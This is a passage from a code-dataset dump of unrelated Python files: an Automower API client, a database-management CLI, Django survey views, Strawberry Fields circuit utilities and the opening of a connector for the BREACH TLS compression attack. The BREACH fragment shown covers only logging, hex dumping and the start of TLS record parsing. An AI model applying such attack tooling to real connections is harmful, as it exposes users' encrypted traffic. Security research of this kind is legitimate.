self.api_key,\n \"grant_type\": \"refresh_token\",\n \"refresh_token\": self.refresh_token,\n },\n quote_via=quote_plus,\n )\n\n async def async_refresh_access_token(self):\n \"\"\"Return the refresh token.\"\"\"\n async with aiohttp.ClientSession(headers=AUTH_HEADERS) as session:\n async with session.post(AUTH_API_URL, data=self.auth_data) as resp:\n _LOGGER.debug(\"Resp.status refresh token: %i\", resp.status)\n if resp.status == 200:\n result = await resp.json(encoding=\"UTF-8\")\n result[\"expires_at\"] = result[\"expires_in\"] + time.time()\n result[\"status\"] = resp.status\n return result\n elif resp.status in [400, 401, 404]:\n raise TokenRefreshError(\n f\"The token cannot be refreshed, respone from Husqvarna Automower API: {resp.status}\"\n )\n\n\nclass ValidateAccessToken:\n \"\"\"Class to validate the Access Token.\"\"\"\n\n def __init__(self, api_key, access_token, provider):\n \"\"\"Initialize the Auth-API and store the auth so we can make requests.\"\"\"\n self.api_key = api_key\n self.access_token = access_token\n self.provider = provider\n self.token_url = f\"{TOKEN_URL}/{self.access_token}\"\n self.token_headers = {\n \"Authorization-Provider\": \"{0}\".format(self.provider),\n \"Accept\": \"application/json\",\n \"X-Api-Key\": \"{0}\".format(self.api_key),\n }\n\n async def async_validate_access_token(self):\n \"\"\"Returns information about the current token.\"\"\"\n async with aiohttp.ClientSession(headers=self.token_headers) as session:\n async with session.get(self.token_url) as resp:\n _LOGGER.debug(\"Resp.status validate token: %i\", resp.status)\n if resp.status == 200:\n result = await resp.json(encoding=\"UTF-8\")\n if resp.status == 404:\n raise TokenValidationError(\n f\"The token is probably expired or invalid, respone from Husqvarna Automower API: {resp.status}\"\n )\n result[\"status\"] = resp.status\n return result\n\n\nclass GetMowerData:\n \"\"\"Class to communicate with the Automower Connect API.\"\"\"\n\n def __init__(self, api_key, access_token, provider, token_type):\n \"\"\"Initialize the Communication API to get data.\"\"\"\n self.api_key = api_key\n self.access_token = access_token\n self.provider = provider\n self.token_type = token_type\n self.mower_headers = {\n \"Authorization\": \"{0} {1}\".format(self.token_type, self.access_token),\n \"Authorization-Provider\": \"{0}\".format(self.provider),\n \"Content-Type\": \"application/vnd.api+json\",\n \"X-Api-Key\": \"{0}\".format(self.api_key),\n }\n\n async def async_mower_state(self):\n \"\"\"Return the mowers data as a list of mowers.\"\"\"\n async with aiohttp.ClientSession(\n headers=self.mower_headers, timeout=timeout\n ) as session:\n async with session.get(MOWER_API_BASE_URL) as resp:\n _LOGGER.debug(\"Resp.status mower data: %i\", resp.status)\n if resp.status == 200:\n result = await resp.json(encoding=\"UTF-8\")\n if resp.status >= 400:\n resp.raise_for_status()\n result[\"status\"] = resp.status\n return result\n\n\nclass Return:\n \"\"\"Class to send commands to the Automower Connect API.\"\"\"\n\n def __init__(self, api_key, access_token, provider, token_type, mower_id, payload):\n \"\"\"Initialize the API and store the auth so we can send commands.\"\"\"\n self.api_key = api_key\n self.access_token = access_token\n self.provider = provider\n self.token_type = token_type\n self.mower_id = mower_id\n self.mower_headers = {\n \"Authorization\": \"{0} {1}\".format(self.token_type, self.access_token),\n \"Authorization-Provider\": \"{0}\".format(self.provider),\n \"Content-Type\": \"application/vnd.api+json\",\n \"accept\": \"*/*\",\n \"X-Api-Key\": \"{0}\".format(self.api_key),\n }\n self.mower_action_url = f\"{MOWER_API_BASE_URL}{self.mower_id}/actions\"\n self.payload = payload\n\n async def async_mower_command(self):\n \"\"\"Send a payload to the mower to execute a command.\"\"\"\n async with aiohttp.ClientSession(headers=self.mower_headers) as session:\n async with session.post(self.mower_action_url, data=self.payload) as resp:\n result = await session.close()\n _LOGGER.debug(\"Sent payload: %s\", self.payload)\n _LOGGER.debug(\"Resp status mower command: %s\", resp.status)\n return resp.status\n\n\nclass DeleteAccessToken:\n \"\"\"Class to invalidate an access token.\"\"\"\n\n def __init__(self, api_key, provider, access_token):\n \"\"\"Initialize the Auth-API and store the auth so we can make requests.\"\"\"\n self.api_key = api_key\n self.provider = provider\n self.delete_headers = {\n \"Authorization-Provider\": \"{0}\".format(self.provider),\n \"X-Api-Key\": \"{0}\".format(self.api_key),\n \"Accept\": \"application/json\",\n }\n self.access_token = access_token\n self.delete_url = f\"{TOKEN_URL}/{self.access_token}\"\n\n async def async_delete_access_token(self):\n \"\"\"Delete the token.\"\"\"\n async with aiohttp.ClientSession(headers=self.delete_headers) as session:\n async with session.delete(self.delete_url) as resp:\n _LOGGER.debug(\"Resp.status delete token: %i\", resp.status)\n if resp.status == 204:\n result = await resp.json(encoding=\"UTF-8\")\n if resp.status >= 400:\n resp.raise_for_status()\n return result\n","sub_path":"aioautomower/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":9040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"481654442","text":"import click\nimport click_repl\n\n\n@click.group(invoke_without_command=True)\n@click.pass_context\ndef cli(ctx):\n if ctx.invoked_subcommand is None:\n ctx.invoke(repl)\n\n\n@cli.command()\n@click.argument('what')\n@click.option('--deamon', is_flag=True)\n@click.option('--check', is_flag=True)\ndef run(what, deamon, check):\n \"\"\" application entry point \"\"\"\n if check:\n from database.database_manupulation import create_all\n create_all()\n if what == 'bot':\n if deamon:\n import subprocess\n with open('bot_log', 'w') as fd:\n p = subprocess.Popen(['python', 'manage.py', 'run', 'bot'],\n cwd=\".\",\n stdout=subprocess.DEVNULL,\n stderr=fd)\n print(p.pid)\n else:\n from bots.telegram_bot import main\n main()\n elif what == 'flask':\n if deamon:\n import subprocess\n with open('flask_log', 'w') as fd:\n p = subprocess.Popen(['python', 'manage.py', 'run', 'flask'],\n cwd=\".\",\n stdout=subprocess.DEVNULL,\n stderr=fd)\n print(p.pid)\n else:\n from stella_api.app import app\n app.run(host='0.0.0.0', port=5000)\n elif what == 'all':\n import subprocess\n with open('bot_log', 'w') as fd:\n p1 = subprocess.Popen(['python', 'manage.py', 'run', 'bot'],\n cwd=\".\",\n stdout=subprocess.DEVNULL,\n stderr=fd)\n with open('flask_log', 'w') as fd:\n p2 = subprocess.Popen(['python', 'manage.py', 'run', 'flask'],\n cwd=\".\",\n stdout=subprocess.DEVNULL,\n stderr=fd)\n if not deamon:\n print('running')\n p1.wait()\n p2.wait()\n else:\n print(p1.pid)\n print(p2.pid)\n else:\n print(f'option not recognized: {what}')\n\n\n@cli.command()\ndef show_schema():\n \"\"\" describes database schema \"\"\"\n from database.models import Base\n for table in Base.metadata.tables.values():\n print(table.name)\n fks = Base.metadata.tables[table.name].foreign_keys\n fks = {i.target_fullname.replace('.', '_'): i.column for i in fks}\n for column in table.c:\n if column.name in fks:\n print(' ', column.name, 'foreign key to', fks[column.name])\n else:\n print(' ', column.name, column.type)\n print()\n\n\n@cli.command()\ndef create():\n \"\"\" creates table(s) \"\"\"\n from database.database_manupulation import create_all\n create_all()\n\n\n@cli.command()\ndef fixture():\n \"\"\"fixture\"\"\"\n from database.models import Fuel, FuelCompany\n from database.queries import session_scope\n with session_scope() as session:\n for company_name in ['Юкон', 'Брсм']:\n session.add(FuelCompany(fuel_company_name=company_name))\n session.commit()\n for fuel, is_premium in [('95+', False),\n ('95E', True),\n ('92', False),\n ('ДП+', False),\n ('ДП', False),\n ('ГАЗ', False),\n ('95', False)]:\n session.add(Fuel(fuel_type=fuel, is_premium=is_premium))\n session.commit()\n\n\n@cli.command()\n@click.option('--all', is_flag=True)\n@click.option('--tables')\ndef truncate(all, tables):\n \"\"\" truncates table(s) \"\"\"\n if all:\n from database.database_manupulation import truncate_all_tables\n truncate_all_tables()\n elif tables:\n from database.database_manupulation import truncate_tables\n truncate_tables(*tables.split(','))\n\n\n@cli.command()\n@click.option('--all', is_flag=True)\n@click.option('--tables')\ndef drop(all, tables):\n \"\"\" drops table(s) \"\"\"\n if all:\n from database.database_manupulation import drop_all_tables\n drop_all_tables()\n elif tables:\n from database.database_manupulation import drop_tables\n drop_tables(*tables.split(','))\n\n\n@cli.command()\ndef fake():\n \"\"\" create fake instances in database \"\"\"\n import random\n from itertools import chain\n from faker import Faker\n from database.queries import get_or_create\n from database.db_connection import session_maker\n from database.models import (User, FuelCompany, Fuel, GasStation, Images,\n Price)\n\n fake = Faker()\n session = session_maker()\n\n tg_uids = random.sample(list(range(10_000)), 5)\n users = [get_or_create(session, User, tg_id=uid) for uid in tg_uids]\n\n fuel_company_names = [fake.company() for _ in range(3)]\n companies = [get_or_create(session, FuelCompany, fuel_company_name=n)\n for n in fuel_company_names]\n\n fuel_marks = ['92', '98', '95', '80']\n fuels = [get_or_create(session, Fuel, fuel_type=f, is_premium=False)\n for f in fuel_marks]\n\n addresses = [fake.address() for _ in range(10)]\n gas_stations = [get_or_create(session, GasStation, address=a,\n fuel_company_id=random.choice(companies).id)\n for a in addresses]\n\n links = [fake.image_url(width=500, height=400) for _ in range(10)]\n recognized = [fake.pybool() for _ in range(10)]\n metadata = [fake.pybool() for _ in range(10)]\n images = [get_or_create(session, Images, link=l, is_recognized=r,\n is_from_metadata=m)\n for l, r, m in zip(links, recognized, metadata)]\n\n prices = [get_or_create(session, Price, price=random.uniform(0, 99),\n gas_station_id=random.choice(gas_stations).id,\n fuel_id=random.choice(fuels).id,\n images_id=i.id)\n for i in images]\n\n for entity in chain(users, companies, fuels, gas_stations, images, prices):\n session.add(entity)\n\n session.commit()\n\n\n@cli.command()\ndef repl():\n click_repl.repl(click.get_current_context())\n\n\n@cli.command()\ndef help():\n print('run - runs apllication\\n'\n 'show-schema - describes database schema\\n'\n 'create - creates table(s)\\n'\n 'truncate - truncates table(s)\\n'\n 'drop - drops table(s)\\n'\n 'fake - fill database with fake records')\n\n\nif __name__ == '__main__':\n cli(obj={})\n","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":6707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"506667426","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.views import generic\nfrom .models import *\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\nfrom django.template.defaulttags import register\n# Create your views here.\n\n\n@login_required\ndef index(request):\n user_subject = UserSubject.objects.get(user__id=request.user.id)\n # usuario encerrou o experimento, nao mostra nada\n if not user_subject.on_experiment:\n return HttpResponseRedirect(reverse('summaries:the_end'))\n\n summaries = Summary.objects.filter(experiment__id=user_subject.experiment.id)\n answers = []\n for summary in summaries:\n answers.append({\"summary\":summary, \"answer\":summary.answer(request.user)})\n context = {'answers': answers}\n return render(request, 'summaries/index.html', context)\n\n\n@login_required\ndef smells_relevance(request, summary_id):\n user_subject = UserSubject.objects.get(user__id=request.user.id)\n # usuario encerrou o experimento, nao mostra nada\n if not user_subject.on_experiment:\n return HttpResponseRedirect(reverse('summaries:the_end'))\n\n summary = get_object_or_404(Summary, pk=summary_id)\n answer = summary.answer(request.user)\n smells_instances = summary.codesmellinstance_set.all()\n\n for sinstance in smells_instances:\n smell_answer = get_smell_answer(answer, sinstance)\n sinstance.was_important = smell_answer.was_important\n\n context = {'summary': summary,\n 'answer': answer,\n 'smells_instances': smells_instances}\n return render(request, 'summaries/smells_relevance.html', context)\n\n\n@login_required\ndef all_smells(request):\n user_subject = UserSubject.objects.get(user__id=request.user.id)\n # usuario encerrou o experimento, nao mostra nada\n if not user_subject.on_experiment:\n return HttpResponseRedirect(reverse('summaries:the_end'))\n\n smells = CodeSmell.objects.order_by('name')\n context = {'smells': smells}\n return render(request, 'summaries/all_smells.html', context)\n\n\n@login_required\ndef design_problems(request):\n user_subject = UserSubject.objects.get(user__id=request.user.id)\n # usuario encerrou o experimento, nao mostra nada\n if not user_subject.on_experiment:\n return HttpResponseRedirect(reverse('summaries:the_end'))\n\n problems = DesignProblem.objects.order_by('name')\n context = {'design_problems': problems}\n return render(request, 'summaries/design_problems.html', context)\n\n\n@login_required\ndef save_smells_relevance(request, summary_id):\n user_subject = UserSubject.objects.get(user__id=request.user.id)\n # usuario encerrou o experimento, nao mostra nada\n if not user_subject.on_experiment:\n return HttpResponseRedirect(reverse('summaries:the_end'))\n\n summary = get_object_or_404(Summary, pk=summary_id)\n if summary.experiment.id != user_subject.experiment.id:\n return HttpResponseRedirect(reverse('summaries:index'))\n\n answer = summary.answer(request.user)\n if answer is None:\n return HttpResponseRedirect(reverse('summaries:details', kwargs={'summary_id': summary_id}))\n\n for sinstance in summary.codesmellinstance_set.all():\n smell_answer = get_smell_answer(answer, sinstance)\n was_important = request.POST[\"was_important_%s\" % sinstance.id] == 'True'\n smell_answer.was_important = was_important\n smell_answer.save()\n\n return HttpResponseRedirect(reverse('summaries:index'))\n\n\n@register.filter\ndef get_item(dictionary, key):\n if len(dictionary[key]) == 0:\n return 'Nenhuma anomalia encontrada'\n return \", \".join(list(dictionary.get(key)))\n\n\n@login_required\ndef details(request, summary_id):\n user_subject = UserSubject.objects.get(user__id=request.user.id)\n # usuario encerrou o experimento, nao mostra nada\n if not user_subject.on_experiment:\n return HttpResponseRedirect(reverse('summaries:the_end'))\n\n summary = get_object_or_404(Summary, pk=summary_id)\n if summary.experiment.id != user_subject.experiment.id:\n return HttpResponseRedirect(reverse('summaries:index'))\n\n answer = summary.answer(request.user)\n smells_instances = summary.codesmellinstance_set.all()\n if answer:\n # consulta pra cada usuario se ele marcou se a instancia eh smell ou nao\n for instance in smells_instances:\n result = SummaryAnswerCodeSmell.objects.filter(summary_answer__id=answer.id, instance__id=instance.id)\n if result:\n instance.opinion = result[0].opinion\n else:\n answer = SummaryAnswer()\n\n similar_by_smell = []\n if not summary.experiment.type.is_complete:\n similar_by_smell = summary.similar_by_smell(request.user)\n\n opinions = CodeSmellOpinion.objects.all()\n summary.parse_agglomerations()\n context = {'summary': summary,\n 'answer':answer,\n 'smells_instances':smells_instances,\n 'importance': SummaryAnswer.IMPORTANCE,\n 'opinions': opinions,\n 'similar_by_smell': similar_by_smell}\n return render(request, 'summaries/detail.html', context)\n\n\ndef get_smell_answer(answer, instance):\n result = SummaryAnswerCodeSmell.objects.filter(summary_answer__id=answer.id, instance__id=instance.id)\n if result:\n return result[0]\n else:\n sacs = SummaryAnswerCodeSmell()\n sacs.summary_answer = answer\n sacs.instance = instance\n return sacs\n\n\n@login_required\ndef save(request, summary_id):\n user_subject = UserSubject.objects.get(user__id=request.user.id)\n # usuario encerrou o experimento, nao mostra nada\n if not user_subject.on_experiment:\n return HttpResponseRedirect(reverse('summaries:the_end'))\n\n summary = get_object_or_404(Summary, pk=summary_id)\n if summary.experiment.id != user_subject.experiment.id:\n return HttpResponseRedirect(reverse('summaries:index'))\n\n answer = summary.answer(request.user)\n if answer is None:\n answer = SummaryAnswer()\n answer.user = request.user\n answer.summary = summary\n answer.agglomeration_rating = request.POST.get('rel_aglomeracao', None)\n answer.design_patterns_rating = request.POST.get('rel_dpatterns', None)\n answer.smells_rating = request.POST.get('rel_smells', None)\n answer.design_principles_rating = request.POST.get('rel_dprinciples', None)\n answer.examples_rating = request.POST.get('rel_examples', None)\n answer.non_functional_ratings = request.POST.get('rel_nonfunc', None)\n answer.observations = request.POST.get('observations', '')\n answer.save()\n\n if not summary.experiment.type.is_complete:\n for sinstance in summary.codesmellinstance_set.all():\n smell_answer = get_smell_answer(answer, sinstance)\n opinion_id = request.POST[\"smell_opinion_%s\" % sinstance.id]\n opinion = get_object_or_404(CodeSmellOpinion, pk=opinion_id)\n smell_answer.opinion = opinion\n smell_answer.save()\n\n s_rating = answer.smells_rating\n if summary.experiment.type.is_complete and s_rating is not None and s_rating != '0':\n return HttpResponseRedirect(reverse('summaries:smells_relevance', kwargs={'summary_id': summary_id}))\n else:\n return HttpResponseRedirect(reverse('summaries:index'))\n\n\n@login_required\ndef the_end(request):\n return render(request, 'summaries/the_end.html')\n\n\n@login_required\ndef finish(request):\n subject = UserSubject.objects.get(user__id=request.user.id)\n subject.on_experiment = False\n subject.save()\n return HttpResponseRedirect(reverse('summaries:the_end'))","sub_path":"summaries/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"456103324","text":"# Copyright 2019 Xanadu Quantum Technologies Inc.\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"\nThis module contains various utility classes and functions used\nwithin the :class:`~.Program` class.\n\"\"\"\n\nfrom collections.abc import Sequence\n\nimport networkx as nx\n\nfrom .parameters import MeasuredParameter\n\n\n__all__ = [\n \"Program_current_context\",\n \"RegRefError\",\n \"CircuitError\",\n \"MergeFailure\",\n \"Command\",\n \"RegRef\",\n \"list_to_grid\",\n \"grid_to_DAG\",\n \"DAG_to_list\",\n \"list_to_DAG\",\n \"group_operations\",\n \"optimize_circuit\",\n]\n\n\nProgram_current_context = None\n\"\"\"Context for inputting a Program. Used to be a class attribute of :class:`.Program`, placed\nhere to avoid cyclic imports.\"\"\"\n# todo: Avoid issues with Program contexts and threading,\n# cf. _pydecimal.py in the python standard distribution.\n\n\nclass RegRefError(IndexError):\n \"\"\"Exception raised by :class:`.Program` when it encounters an invalid register reference.\n\n E.g., trying to apply a gate to a nonexistent or deleted subsystem.\n \"\"\"\n\n\nclass CircuitError(RuntimeError):\n \"\"\"Exception raised by :class:`.Program` when it encounters an illegal\n operation in the quantum circuit.\n\n E.g., trying to use an Operation type that is unsupported by the current compilation target.\n \"\"\"\n\n\nclass MergeFailure(RuntimeError):\n \"\"\"Exception raised by :meth:`strawberryfields.ops.Operation.merge` when an\n attempted merge fails.\n\n E.g., trying to merge two gates of different families.\n \"\"\"\n\n\nclass Command:\n \"\"\"Represents a quantum operation applied on specific subsystems of the register.\n\n A Command instance is immutable once created, and can be shared between\n several :class:`.Program` instances.\n\n Args:\n op (~strawberryfields.ops.Operation): quantum operation to apply\n reg (Sequence[RegRef]): Subsystems to which the operation is applied.\n Note that the order matters here.\n \"\"\"\n\n # pylint: disable=too-few-public-methods\n\n def __init__(self, op, reg):\n # accept a single RegRef in addition to a Sequence\n if not isinstance(reg, Sequence):\n reg = [reg]\n\n #: Operation: quantum operation to apply\n self.op = op\n #: Sequence[RegRef]: subsystems to which the operation is applied\n self.reg = reg\n\n def __str__(self):\n \"\"\"\n Return a string containing the command in Blackbird syntax.\n \"\"\"\n\n operation = str(self.op)\n if self.op.ns == 0:\n # op takes no subsystems as parameters, do not print anything more\n code = operation\n else:\n subsystems = \", \".join([str(r) for r in self.reg])\n code = \"{} | ({})\".format(operation, subsystems)\n return code\n\n def __lt__(self, other):\n # Needed as a tiebreaker for NetworkX lexicographical_topological_sort()\n # due to a buggy implementation! Any order will do. Remove when NetworkX is fixed.\n return True\n\n def get_dependencies(self):\n \"\"\"Subsystems the command depends on.\n\n Combination of ``self.reg`` and ``self.op.measurement_deps``.\n\n .. note:: ``measurement_deps`` are used to ensure that the measurement\n happens before the result is used, but this is a bit too strict:\n two gates depending on the same measurement result but otherwise\n acting on different subsystems should commute.\n\n Returns:\n set[RegRef]: set of subsystems the command depends on\n \"\"\"\n deps = self.op.measurement_deps | set(self.reg)\n return deps\n\n\nclass RegRef:\n \"\"\"Quantum register reference.\n\n The objects of this class refer to a specific subsystem (mode) of\n a quantum register.\n\n Within the scope of each :class:`.Program` instance, only one RegRef instance\n should exist per subsystem. Program keeps the authoritative mapping\n of subsystem indices to RegRef instances.\n Subsystem measurement results are stored in the \"official\" RegRef object.\n If other RegRef objects referring to the same subsystem exist, they will\n not be updated. Once a RegRef is assigned a subsystem index it will never\n change, not even if the subsystem is deleted.\n\n The RegRefs are constructed in :meth:`.Program._add_subsystems`.\n\n Args:\n ind (int): index of the register subsystem referred to\n \"\"\"\n\n # pylint: disable=too-few-public-methods\n\n def __init__(self, ind):\n self.ind = ind #: int: subsystem index\n self.val = None #: float, complex: Measurement result. None if the subsystem has not been measured yet.\n self.active = True #: bool: True at construction, False after the subsystem is deleted\n\n def __str__(self):\n return \"q[{}]\".format(self.ind)\n\n def __hash__(self):\n \"\"\"Hashing method.\n\n NOTE: Has to match :meth:`__eq__` such that if two RegRefs compare equal they must have equal hashes.\n \"\"\"\n return hash((self.ind, self.active))\n\n def __eq__(self, other):\n \"\"\"Equality comparison.\n\n Compares the index and the activity state of the two RegRefs, the val field does not matter.\n NOTE: Affects the hashability of RegRefs, see also :meth:`__hash__`.\n \"\"\"\n if other.__class__ != self.__class__:\n print(\"--------------- regref.__eq__: compared reqref to \", other.__class__)\n return False\n return self.ind == other.ind and self.active == other.active\n\n @property\n def par(self):\n \"\"\"Convert the RegRef into a measured parameter.\n\n Returns:\n MeasuredParameter: measured parameter linked to this RegRef\n \"\"\"\n return MeasuredParameter(self)\n\n\n# =================\n# Utility functions\n# =================\n\n\ndef list_to_grid(ls):\n \"\"\"Transforms a list of Commands to a grid representation.\n\n The grid is a mapping from subsystem indices to lists of :class:`Command` instances touching\n that subsystem, in temporal order. The same Command instance will appear in each list that\n corresponds to one of its subsystems.\n\n Args:\n ls (Iterable[Command]): quantum circuit\n Returns:\n dict[int, list[Command]]: same circuit in grid form\n \"\"\"\n grid = {}\n # enter every operation in the list to its proper position in the grid\n for cmd in ls:\n for r in cmd.get_dependencies():\n # Add cmd to the grid to the end of the line r.ind.\n grid.setdefault(r.ind, []).append(cmd)\n return grid\n\n\ndef grid_to_DAG(grid):\n \"\"\"Transforms a grid of Commands to a DAG representation.\n\n In the DAG (directed acyclic graph) each node is a :class:`Command` instance,\n and edges point from Commands to their immediate dependents/followers.\n\n Args:\n grid (dict[int, list[Command]]): quantum circuit\n Returns:\n networkx.DiGraph[Command]: same circuit in DAG form\n \"\"\"\n DAG = nx.DiGraph()\n for _, q in grid.items():\n if q:\n # add the first operation on the wire that does not depend on anything\n DAG.add_node(q[0])\n for i in range(1, len(q)):\n # add the edge between the operations, and the operation nodes themselves\n DAG.add_edge(q[i - 1], q[i])\n return DAG\n\n\ndef list_to_DAG(ls):\n \"\"\"Transforms a list of Commands to a DAG representation.\n\n In the DAG (directed acyclic graph) each node is a :class:`Command` instance,\n and edges point from Commands to their immediate dependents/followers.\n\n Args:\n ls (Iterable[Command]): quantum circuit\n Returns:\n networkx.DiGraph[Command]: same circuit in DAG form\n \"\"\"\n return grid_to_DAG(list_to_grid(ls))\n\n\ndef DAG_to_list(dag):\n \"\"\"Transforms a Command DAG to a list representation.\n\n The list contains the :class:`Command` instances in (one possible) topological order,\n i.e., dependants following the operations they depend on.\n\n Args:\n dag (networkx.DiGraph[Command]): quantum circuit\n Returns:\n list[Command]: same circuit in list form\n \"\"\"\n # sort the operation graph into topological order\n temp = nx.algorithms.dag.topological_sort(dag)\n return list(temp)\n\n\ndef group_operations(seq, predicate):\n \"\"\"Group a set of Operations in a circuit together (if possible).\n\n For the purposes of this method, we call a :class:`Operation` instance *marked* iff\n ``predicate`` returns True on it.\n\n This method converts the quantum circuit in ``seq`` into an equivalent circuit ``A+B+C``,\n where the :class:`Command` instances in sequences ``A`` and ``C`` do not contain any\n marked Operations.\n The sequence ``B`` contains all marked Operations in the circuit, and possibly\n additional unmarked instances that could not be moved into ``A`` or ``C`` using the\n available commutation rules.\n Any of the three returned sequences can be empty (but if ``B`` is empty then so is ``C``).\n\n Args:\n seq (Sequence[Command]): quantum circuit\n predicate (Callable[[Operation], bool]): Grouping predicate. Returns True for the\n Operations to be grouped together, False for the others.\n Returns:\n Tuple[Sequence[Command]]: A, B, C such that A+B+C is equivalent to seq,\n and A and C do not contain any marked Operation instances.\n \"\"\"\n\n def find_first_index(seq):\n \"\"\"Index of the first element in the sequence for which the predicate function returns True.\n If no such element exists, returns the length of the sequence.\n \"\"\"\n return next((i for i, e in enumerate(seq) if predicate(e.op)), len(seq))\n\n def marked_last(node):\n \"\"\"Mapping from nodes to sorting keys to resolve ambiguities in the topological sort.\n Larger key values come later in the lexicographical-topological ordering.\n \"\"\"\n if predicate(node.op):\n return 1\n return 0\n\n def lex_topo(seq, key):\n \"\"\"Sorts a Command sequence lexicographical-topologically using the given lexicographic key function.\"\"\"\n DAG = list_to_DAG(seq)\n return list(nx.algorithms.dag.lexicographical_topological_sort(DAG, key=key))\n\n C = lex_topo(seq, key=marked_last)\n ind = find_first_index(C)\n A = C[:ind] # initial unmarked instances\n B = C[ind:] # marked and possibly unmarked\n\n # re-sort B, marked instances first\n C = lex_topo(B, key=lambda x: -marked_last(x))\n # find last marked\n ind = len(C) - find_first_index(list(reversed(C)))\n B = C[:ind] # marked and still possibly unmarked\n C = C[ind:] # final unmarked instances\n return A, B, C\n\n\ndef optimize_circuit(seq):\n \"\"\"Try to simplify and optimize a quantum circuit.\n\n The purpose of the optimizer is to simplify the circuit\n to make it cheaper and faster to execute. Different backends may require\n different types of optimization, but in general the fewer operations a circuit has,\n the faster it should run. The optimizer thus should convert the circuit into a\n simpler :term:`equivalent circuit`.\n\n The optimizations are based on the abstract algebraic properties of the Operations\n constituting the circuit, e.g., combining two consecutive gates of the same gate family,\n and at no point should require a matrix representation of any kind.\n The optimization must also not change the state of the RegRefs in any way.\n\n Currently the optimization is very simple. It\n\n * merges neighboring :class:`state preparations <.Preparation>` and :class:`gates <.Gate>`\n belonging to the same family and acting on the same sequence of subsystems\n * cancels neighboring pairs of a gate and its inverse\n\n Args:\n seq (Sequence[Command]): quantum circuit to optimize\n\n Returns:\n List[Command]: optimized circuit\n \"\"\"\n\n def _print_list(i, q, print_fn=print):\n \"For debugging.\"\n # pylint: disable=unreachable\n return\n print_fn(\"i: {}, len: {} \".format(i, len(q)), end=\"\")\n for x in q:\n print_fn(x.op, \", \", end=\"\")\n print_fn()\n\n grid = list_to_grid(seq)\n\n # try merging neighboring operations on each wire\n # TODO the merging could also be done using the circuit DAG, which\n # might be smarter (ns>1 would be easy)\n for k in grid:\n q = grid[k]\n i = 0 # index along the wire\n _print_list(i, q)\n while i + 1 < len(q):\n # at least two operations left to merge on this wire\n try:\n a = q[i]\n b = q[i + 1]\n # the ops must have equal size and act on the same wires\n if a.op.ns == b.op.ns and a.reg == b.reg:\n if a.op.ns != 1:\n # ns > 1 is tougher. on no wire must there be anything\n # between them, also deleting is more complicated\n # todo treat it as a failed merge for now\n i += 1\n continue\n op = a.op.merge(b.op)\n # merge was successful, delete the old ops\n del q[i : i + 2]\n # insert the merged op (unless it's identity)\n if op is not None:\n q.insert(i, Command(op, a.reg))\n # move one spot backwards to try another merge\n if i > 0:\n i -= 1\n _print_list(i, q)\n continue\n except MergeFailure:\n pass\n i += 1 # failed at merging the ops, move forward\n\n # convert the circuit back into a list (via a DAG)\n DAG = grid_to_DAG(grid)\n return DAG_to_list(DAG)\n","sub_path":"strawberryfields/program_utils.py","file_name":"program_utils.py","file_ext":"py","file_size_in_byte":14234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"612393885","text":"'''\nFile: connect.py\nAuthor: Dimitris Karakostas\nDescription: Network connection and traffic parsing on TLS level.\n'''\n\nimport socket\nimport select\nimport logging\nimport binascii\nimport sys\nimport signal\nfrom iolibrary import kill_signal_handler, get_arguments_dict, setup_logger\nimport constants\n\n\nsignal.signal(signal.SIGINT, kill_signal_handler)\n\n\nclass Connector():\n '''\n Class that handles the network connection for breach.\n '''\n def __init__(self, args_dict):\n '''\n Initialize loggers and arguments dictionary.\n '''\n self.args_dict = args_dict\n if 'full_logger' not in args_dict:\n if args_dict['verbose'] < 4:\n setup_logger('full_logger', 'full_breach.log', args_dict, logging.ERROR)\n else:\n setup_logger('full_logger', 'full_breach.log', args_dict)\n self.full_logger = logging.getLogger('full_logger')\n self.args_dict['full_logger'] = self.full_logger\n else:\n self.full_logger = args_dict['full_logger']\n if 'basic_logger' not in args_dict:\n if args_dict['verbose'] < 3:\n setup_logger('basic_logger', 'basic_breach.log', args_dict, logging.ERROR)\n else:\n setup_logger('basic_logger', 'basic_breach.log', args_dict)\n self.basic_logger = logging.getLogger('basic_logger')\n self.args_dict['basic_logger'] = self.basic_logger\n else:\n self.basic_logger = args_dict['basic_logger']\n if 'debug_logger' not in args_dict:\n if args_dict['verbose'] < 2:\n setup_logger('debug_logger', 'debug.log', args_dict, logging.ERROR)\n else:\n setup_logger('debug_logger', 'debug.log', args_dict)\n self.debug_logger = logging.getLogger('debug_logger')\n self.args_dict['debug_logger'] = self.debug_logger\n else:\n self.debug_logger = args_dict['debug_logger']\n return\n\n def log_data(self, data):\n '''\n Print hexadecimal and ASCII representation of data\n '''\n pad = 0\n output = []\n buff = '' # Buffer of 16 chars\n\n for i in xrange(0, len(data), constants.LOG_BUFFER):\n buff = data[i:i+constants.LOG_BUFFER]\n hex = binascii.hexlify(buff) # Hex representation of data\n pad = 32 - len(hex)\n txt = '' # ASCII representation of data\n for ch in buff:\n if ord(ch) > 126 or ord(ch) < 33:\n txt = txt + '.'\n else:\n txt = txt + chr(ord(ch))\n output.append('%2d\\t %s%s\\t %s' % (i, hex, pad*' ', txt))\n\n return '\\n'.join(output)\n\n def parse(self, data, past_bytes_endpoint, past_bytes_user, chunked_endpoint_header, chunked_user_header, is_response=False):\n '''\n Parse data and print header information and payload.\n '''\n lg = ['\\n']\n downgrade = False\n\n # Check for defragmentation between packets\n if is_response:\n # Check if TLS record header was chunked between packets and append it to the beginning\n if chunked_endpoint_header:\n data = chunked_endpoint_header + data\n chunked_endpoint_header = None\n # Check if there are any remaining bytes from 